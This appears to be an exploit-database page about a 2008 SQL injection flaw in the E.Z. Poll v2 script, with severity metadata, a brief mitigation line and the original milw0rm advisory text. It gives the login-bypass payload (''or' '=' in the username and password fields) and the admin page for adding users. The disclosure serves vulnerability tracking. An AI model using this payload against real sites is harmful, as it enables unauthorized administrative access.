header-logo
Suggest Exploit
vendor:
E.Z. Poll
by:
t0fx aka xtof69
9
CVSS
HIGH
SQL Injection
89
CWE
Product Name: E.Z. Poll
Affected Version From: v.2
Affected Version To: v.2
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

E.Z. Poll <= v.2 script Remote SQL injection Exploit

E.Z. Poll <= v.2 script is vulnerable to a Remote SQL injection attack. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable page http://www.site.com/admin/login.asp with the username and password set to 'or' '=' . This will allow the attacker to gain access to the admin panel and add or modify users via the /admin/admin-users.asp page.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.
Source

Exploit-DB raw data:

Description:
************* ***************** ************* *******************
E.Z. Poll <= v.2 script Remote SQL injection Exploit
discovered by t0fx aka xtof69
vendor : E.Z.


************* ***************** ************* *******************

vulnerable page : http://www.site.com/admin/login.asp

exploit :

Username : 'or' '='
Password : 'or' '='

Add, modify user :
/admin/admin-users.asp 

# milw0rm.com [2008-12-01]